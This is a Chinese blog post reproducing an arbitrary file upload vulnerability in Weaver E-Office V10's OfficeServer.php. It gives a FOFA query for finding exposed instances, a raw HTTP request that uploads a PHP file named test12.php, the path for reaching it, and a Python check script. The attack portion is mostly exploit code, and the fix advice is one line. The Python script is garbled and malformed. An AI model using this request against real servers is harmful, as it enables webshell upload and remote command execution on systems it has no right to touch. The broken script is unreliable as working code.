• 泛微OA E-Office V10 OfficeServer 任意文件上传漏洞复现

    声明
    本文仅用于技术交流,请勿用于非法用途
    由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

    漏洞简介

    泛微e-ofice是一款标准化的协同0A办公软件,泛微 E-ofice 10 0ficeServer 存在任意文件上传漏洞,攻击者可以上传任意文件,获取webshell,在服务器上执行任意命令、读取敏感信息等

    FOFA语法

    body="eoffice10" && body="eoffice_loading_tip"

    Poc

    1. POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
    2. Host: xxx.xxx.xxx.xxx
    3. User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
    4. Content-Length: 395
    5. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs
    6. Accept-Encoding: gzip, deflate
    7. Connection: close
    8.  
    9. ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
    10. Content-Disposition: form-data; name="FileData"; filename="1.jpg"
    11. Content-Type: image/jpeg
    12.  
    14. ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
    15. Content-Disposition: form-data; name="FormData"
    16.  
    17. {'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test12.php'}
    18. ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--

     漏洞复现

    1、访问漏洞环境

    2、老形式,burp重放一下

    出现下面的状态码和响应包说明漏洞可能存在

    3、然后访问如下的URL链接,即可查看上传文件内容

    http://xxx.xxx.xxx.xxx/eoffice10/server/public/iWebOffice2015/Document/test12.php

    poc(python脚本)

    1. import re
    2. import requests
    3.  
    4. url='http://xxxxxxxxxx/eoffice10/server/public/iWebOffice2015/OfficeServer.php'
    5. headers = {
    6.     'User - Agent':'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0',
    7.     'Content - Length':'393',
    8.     'Content - Type': 'multipart / form - data;',
    9.     'boundary = ----WebKitFormBoundaryJjb5ZAJOOXO7fwjs'
    10.     'Accept - Encoding': 'gzip, deflate',
    11.     'Connection':'close'
    12. }
    13.  
    14. data = {
    15.     "------WebKitFormBoundaryJjb5ZAJOOXO7fwjs"
    16.     'Content-Disposition': 'form-data; name="FileData"; filename="1.jpg"',
    17.     'Content-Type': 'image/jpeg'
    18.                     
    19.     ''
    20.     "------WebKitFormBoundaryJjb5ZAJOOXO7fwjs",
    21.     'Content-Disposition': 'form-data; name="FormData"'
    22.  
    23.     "{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test12.php'}"
    24.     "------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--"
    25. }
    26.  
    27. response = requests.post(url, headers=headers, data=data)
    28.  
    29. print('Status Code:', response.status_code)
    30.  
    31. if response.status_code == 200:
    32.     print("存在泛微OA E-Office V10 OfficeServer 任意文件上传漏洞!!")

    修复建议

    去官网打补丁

  • 相关阅读:
    Flink之SQL查询操作
    Nacos-2.2.2源码修改集成高斯数据库GaussDB,postresql
    Linux scriptreplay回放你的高光时刻
    nginx利用x_forwarded_for实现黑名单访问策略
    常用模型结构(FNN、CNN、RNN、TDNN、FSMN、Attention)
    【Redis】<键值型数据库>Linux安装Redis(无错完整)
    自定义hooks之useLastState、useSafeState
    hadoop大数据原理与应用------初识Hadoop数据集
    好奇喵 | Surface Web ---> Deep Web ---> Dark Web
    基础知识:临界阻尼
  • 原文地址:https://blog.csdn.net/qq_56698744/article/details/133943903